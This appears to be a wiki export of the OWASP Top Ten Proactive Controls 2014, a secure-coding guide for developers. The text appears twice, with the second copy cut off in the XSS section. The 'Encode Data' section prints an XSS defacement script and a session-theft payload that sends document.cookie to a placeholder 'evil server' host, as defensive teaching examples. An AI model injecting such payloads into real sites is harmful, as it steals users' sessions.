{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. And even when they do, there may be inherent flaws in requirements and designs. When it comes to web security, developers are often set up to lose the security game.<br />
<br />
The OWASP Top Ten Proactive Controls is a list of security techniques that should be included in every software development project. This document was written by developers for developers to assist those new to secure development.<br />
<br />
* 1: Parameterize Queries<br />
* 2: Encode Data<br />
* 3: Validate All Inputs<br />
* 4: Implement Appropriate Access Controls<br />
* 5: Establish Identity and Authentication Controls<br />
* 6: Protect Data and Privacy<br />
* 7: Implement Logging, Error Handling and Intrusion Detection<br />
* 8: Leverage Security Features of Frameworks and Security Libraries<br />
* 9: Include Security-Specific Requirements<br />
* 10: Design and Architect Security In<br />
<br />
For more information, see the [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls complete document here].<br />
<br />
==Licensing==<br />
<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is This? ==<br />
<br />
The OWASP Top Ten Proactive Controls describes the top control and control categories that every architect and developer should absolutely, 100% include in every project.<br />
<br />
== Project Leaders ==<br />
<br />
* [https://www.owasp.org/index.php/User:Jmanico Jim Manico] [mailto:jim.manico@owasp.org @]<br />
* [https://www.owasp.org/index.php/User:Jim_Bird Jim Bird] [mailto:jimbird@shaw.ca @]<br />
<br />
== Key Contributors ==<br />
<br />
* Danny Harris [mailto:danny.harris@owasp.org @]<br />
* Stephen de Vries<br />
* Andrew Van Der Stock<br />
* Gaz Heyes<br />
* Colin Watson<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[OWASP Mobile Security Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== Quick Access ==<br />
<br />
* Top Ten Proactive Controls 2014 [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls full description].<br />
<br />
== News and Events ==<br />
* [10 Mar 2014] [http://lists.owasp.org/pipermail/owasp-leaders/2014-March/011047.html Request for review]<br />
* [04 Feb 2014] New Wiki Template!<br />
<br />
== Mailing List ==<br />
<br />
Keep up-to-date via the [https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List].<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten Proactive Controls 2014. <br />
<br />
<br />
== 1: Parameterize Queries ==<br />
<br />
SQL Injection is one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of Query Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
'''Key References'''<br />
* [[Query Parameterization Cheat Sheet]]<br />
* [https://www.owasp.org/index.php/OWASP_Secure_Coding_Practices_-_Quick_Reference_Guide OWASP Secure Coding Practices Quick Reference Guide]<br />
<br />
<br />
== 2: Encode Data ==<br />
<br />
Encoding is a powerful mechanism to help protect against many types of attack, especially injection attacks. Essentially, encoding involves translating special characters into some equivalent that is no longer significant in the target interpreter. A specific example of encoding is output encoding necessary to prevent Cross Site Scripting. <br />
<br />
Web developers often build web pages dynamically, consisting of a mix of developer built HTML/JavaScript and database data that was originally populated with user input. This input should be considered to be untrusted data and dangerous, which requires special handling when building a secure web application. Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in the user's browser and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML. Forms of encoding needing to stop XSS include HTML Entity Encoding, JavaScript Encoding and Percent Encoding (aka URL Encoding). Encoding needed to stop other forms of injection include Unix encoding, Windows encoding, LDAP encoding, XML encoding and others. OWASP's Enterprise Security API (ESAPI) provides encoders for these functions.<br />
<br />
'''Key References'''<br />
* Stopping XSS in your web application: OWASP [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]<br />
* General information about injection: [[Top 10 2013-A1-Injection]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_Java_Encoder_Project OWASP Java Encoder Project]<br />
* [http://msdn.microsoft.com/en-us/security/aa973814.aspx Microsoft .NET AntiXSS Library]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API OWASP ESAPI]<br />
* [https://www.owasp.org/index.php/OWASP_Encoder_Comparison_Reference_Project OWASP Encoder Comparison Reference Project]<br />
<br />
<br />
== 3: Validate All Inputs ==<br />
<br />
It is critical to treat all input from outside of the application (for example, from browsers or mobile clients, from outside systems or files) as untrusted. For web applications this includes HTTP headers, cookies, and GET and POST parameters: any or all of this data could be compromised by an attacker.<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types of input validation: “white list" validation and "black list" validation. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively because it can be bypassed through encoding and other obfuscation techniques, and is not recommended when building a secure web application. The following examples will focus on white list validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation white list of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
'''Key References''' <br />
* [[Input Validation Cheat Sheet]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_JSON_Sanitizer OWASP JSON Sanitizer Project]<br />
* [https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer OWASP Java HTML Sanitizer Project]<br />
* [http://commons.apache.org/proper/commons-validator/ Apache Commons Validator]<br />
<br />
<br />
== 4: Implement Appropriate Access Controls ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular feature of resource should be granted or denied. It should be noted that authorization is not equivalent to authentication (verifying identity). These terms and their definitions are frequently confused. <br />
<br />
Access Control can be a rather complex and design-heavy security control. The following "positive" access control design requirements should be considered at the initial stages of application development. Once you have chosen a specific access control design pattern, it is often difficult and time consuming to re-engineer access control in your application with a new pattern. Access Control is one of the main areas of application security software design that must be heavily thought-through up front. <br />
<br />
=== Force all requests to go through access control checks ===<br />
Most frameworks and languages only check a feature for access control if a programmer adds that check. The opposite is a more security-centric design. Consider using a filter or other automatic mechanism to ensure that all requests go through some kind of access control check.<br />
<br />
=== Deny by default ===<br />
In line with automatic access control checking, consider denying all access control checks for features that have not been configured for access control. Normally the opposite is true in that newly created features automatically grant users full access until a developer has added that check. <br />
<br />
=== Avoid hard-coded policy-based access control checks in code ===<br />
Very often, access control policy is hard-coded deep in application code. This makes auditing or proving the security of that software very difficult and time consuming. Access control policy and application code, when possible, should be separated. Another way of saying this is that your enforcement layer (checks in code) and your access control decision making process (the access control "engine") should be separated when possible. <br />
<br />
=== Code to the activity ===<br />
Most web frameworks use role based access control as the primary method for coding enforcement points in code. While it's acceptable to use roles in access control mechanisms, coding specifically to the role in application code is an anti-pattern. Considering checking if the user has access to that feature in code, as opposed to checking what role the user is in code.<br />
<br />
=== Server-side trusted data should drive access control ===<br />
The vast majority of data you need to make an access control decision (who is the user and are they logged in, what entitlements does the user have, what is the access control policy, what feature and data is being requested, what time is it, what geolocation is it, etc) should be retrieved "server-side" in a standard web or web service application. Policy data such as a users role or an access control rule should never be part of the request. In a standard web application, the only client-side data that is needed for access control is the id or ids of the data being accessed. Most all other data needed to make an access control decision should be retrieved server-side.<br />
<br />
'''Key References'''<br />
* [[Access Control Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/OWASP_PHPRBAC_Project OWASP PHPRBAC Project]<br />
* [http://shiro.apache.org/authorization-features.html Apache Shiro Authorization features]<br />
<br />
<br />
== 5: Establish Identity and Authentication Controls ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
'''Key References'''<br />
* [[Authentication Cheat Sheet]]<br />
* [[Password Storage Cheat Sheet]]<br />
* [[Forgot Password Cheat Sheet]] <br />
* [[Session Management Cheat Sheet]]<br />
<br />
<br />
== 6: Protect Data and Privacy ==<br />
<br />
=== Use Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
'''Key References'''<br />
* Proper SSL/TLS configuration: [[Transport Layer Protection Cheat Sheet]]<br />
* Protecting users from man-in-the-middle attacks via fraudulent SSL certificates: [[Pinning Cheat Sheet]]<br />
<br />
=== Use Encryption at Rest ===<br />
<br />
Cryptographic storage is difficult to build securely. It's critical to classify data in your system and determine that data needs to be encrypted, such as the need to encrypt credit cards per the PCI compliance standard. Also, any time you start building your own low-level crypto on your own, ensure you are or have the assistance of a deep applied crypto expert. Consider well vetted cryptographic libraries such as the [https://code.google.com/p/keyczar/ Google KeyCzar] project. Also, be prepared to handle the more difficult aspects of applied crypto such as key management, overall cryptographic architecture design as well as tiering and trust issue in complex software. <br />
<br />
'''Key References'''<br />
* Information on low level decisions necessary when encrypting data at rest: [[Cryptographic Storage Cheat Sheet]] <br />
* [[Password Storage Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/O-Saft OWASP SSL Audit for Testers]<br />
<br />
=== Implement Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
<br />
== 7: Implement Logging and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
Use a common logging approach to ensure that all log entries are consistent, and contain essential information including source and timestamp.<br />
<br />
The [[OWASP AppSensor Project]] defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. <br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect from Log Injection aka Log Forging, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
'''Key References'''<br />
* How to properly implement logging in an application: [[Logging Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [[OWASP AppSensor Project]]<br />
<br />
<br />
== 8: Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* [http://static.springsource.org/spring-security/site/index.html Spring Security]<br />
* [http://shiro.apache.org/ Apache Shiro]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet PHP Security Cheat Sheet]<br />
* [https://www.owasp.org/index.php/.NET_Security_Cheat_Sheet .NET Security Cheat Sheet]<br />
<br />
<br />
== 9: Include Security-Specific Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by Q/A staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features include multi-step multi-branch workflows that are difficult to evaluate thoroughly and involve money or valuable items, user credentials, private information or command/control functions, for example eCommerce workflows, shipping route choices, or banking transfer validation. The user stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if the user tries to cancel or repeat a step?) and requirements derived from "abuse cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and abuse case scenarios will uncover weaknesses in validation and error handling that impact the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of any personal or confidential information in the system and make sure that this data is protected. What is the source of the data? Can the source be trusted? Where is the data stored or displayed? Does it have to be stored or displayed? Who is authorized to create it, see it, change it, and is all of this tracked? This will drive the need for data validation, access control, encryption, and auditing and logging controls in the system.<br />
<br />
'''Key References'''<br />
* [[OWASP Application Security Verification Standard Project]]<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model]<br />
* [[Business Logic Security Cheat Sheet]]<br />
* [[Testing for business logic (OWASP-BL-001)]]<br />
<br />
<br />
== 10: Design and Architect Security In ==<br />
<br />
There are several areas where you need to be concerned about security in the architecture and design of a system. These include:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls to enforce at the client, the web layer, the business logic layer, the data management layer, and where to establish trust between different systems or different parts of the same system. Trust boundaries determine where to make decisions about authentication, access control, data validation and encoding, encryption and logging. Data, sources of data and services inside a trust boundary can be trusted - anything outside of a trust boundary cannot be. When designing or changing the design or a system, make sure to understand assumptions about trust, make sure that these assumptions are valid, and make sure that they are followed consistently.<br />
<br />
3) '''Manage the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (should you do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model (OpenSAMM)]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project Application Security Verification Standard Project]<br />
* [https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet Application Security Architecture Cheat Sheet]<br />
* [[Attack Surface Analysis Cheat Sheet]]<br />
* [[Threat Modeling Cheat Sheet]]<br />
<br />
= Formal Numbering =<br />
<br />
* OWASP-C1: Parameterize Queries<br />
* OWASP-C2: Encode Data<br />
* OWASP-C3: Validate All Inputs<br />
* OWASP-C4: Implement Appropriate Access Controls<br />
* OWASP-C5: Establish Identity and Authentication Controls<br />
* OWASP-C6: Protect Data and Privacy<br />
* OWASP-C7: Implement Logging, Error Handling and Intrusion Detection<br />
* OWASP-C8: Leverage Security Features of Frameworks and Security Libraries<br />
* OWASP-C9: Include Security-Specific Requirements<br />
* OWASP-C10: Design and Architect Security In<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! <br />
<br />
== Roadmap ==<br />
<br />
End of April : Complete community review process<br/><br />
End of May : Release final document in well designed PDF form<br />
<br />
== Status ==<br />
<br />
March 10, 2014: We released an early beta of this document to the OWASP leaders list for review and commentary.<br/><br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]] [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]] [[Category:OWASP_Document]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=176455OWASP Proactive Controls2014-06-05T16:52:49Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:Proactive-header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. And even when they do, there may be inherent flaws in requirements and designs. When it comes to web security, developers are often set up to lose the security game.<br />
<br />
The OWASP Top Ten Proactive Controls is a list of security techniques that should be included in every software development project. This document was written by developers for developers to assist those new to secure development.<br />
<br />
* 1: Parameterize Queries<br />
* 2: Encode Data<br />
* 3: Validate All Inputs<br />
* 4: Implement Appropriate Access Controls<br />
* 5: Establish Identity and Authentication Controls<br />
* 6: Protect Data and Privacy<br />
* 7: Implement Logging, Error Handling and Intrusion Detection<br />
* 8: Leverage Security Features of Frameworks and Security Libraries<br />
* 9: Include Security-Specific Requirements<br />
* 10: Design and Architect Security In<br />
<br />
For more information, see the [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls complete document here].<br />
<br />
==Licensing==<br />
<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is This? ==<br />
<br />
The OWASP Top Ten Proactive Controls describes the top control and control categories that every architect and developer should absolutely, 100% include in every project.<br />
<br />
== Project Leaders ==<br />
<br />
* [https://www.owasp.org/index.php/User:Jmanico Jim Manico] [mailto:jim.manico@owasp.org @]<br />
* [https://www.owasp.org/index.php/User:Jim_Bird Jim Bird] [mailto:jimbird@shaw.ca @]<br />
<br />
== Key Contributors ==<br />
<br />
* Danny Harris [mailto:danny.harris@owasp.org @]<br />
* Stephen de Vries<br />
* Andrew Van Der Stock<br />
* Gaz Heyes<br />
* Colin Watson<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[OWASP Mobile Security Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== Quick Access ==<br />
<br />
* Top Ten Proactive Controls 2014 [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls full description].<br />
<br />
== News and Events ==<br />
* [10 Mar 2014] [http://lists.owasp.org/pipermail/owasp-leaders/2014-March/011047.html Request for review]<br />
* [04 Feb 2014] New Wiki Template!<br />
<br />
== Mailing List ==<br />
<br />
Keep up-to-date via the [https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List].<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten Proactive Controls 2014. <br />
<br />
<br />
== 1: Parameterize Queries ==<br />
<br />
SQL Injection is one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of Query Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
'''Key References'''<br />
* [[Query Parameterization Cheat Sheet]]<br />
* [https://www.owasp.org/index.php/OWASP_Secure_Coding_Practices_-_Quick_Reference_Guide OWASP Secure Coding Practices Quick Reference Guide]<br />
<br />
<br />
== 2: Encode Data ==<br />
<br />
Encoding is a powerful mechanism to help protect against many types of attack, especially injection attacks. Essentially, encoding involves translating special characters into some equivalent that is no longer significant in the target interpreter. A specific example of encoding is output encoding necessary to prevent Cross Site Scripting. <br />
<br />
Web developers often build web pages dynamically, consisting of a mix of developer built HTML/JavaScript and database data that was originally populated with user input. This input should be considered to be untrusted data and dangerous, which requires special handling when building a secure web application. Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in the user's browser and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
